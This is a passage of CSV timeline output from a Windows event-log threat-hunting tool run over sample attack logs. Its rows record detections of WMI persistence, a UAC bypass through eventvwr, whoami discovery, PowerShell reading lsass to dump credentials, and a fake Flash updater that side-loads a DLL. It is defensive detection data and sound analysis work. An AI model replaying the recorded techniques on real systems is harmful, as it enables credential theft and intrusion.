365ABB72-F76F-5CA4-0000-0010AA201700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 
365ABB72-AC09-5CB8-0000-0010999C0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 
365ABB72-AC10-5CB8-0000-001047A40700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 
365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 
+09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: 
C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | 
Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS 
Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local 
Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon 
Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: 
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: 
SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 
365ABB72-7AB0-5CC4-0000-0010C5BE0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: 
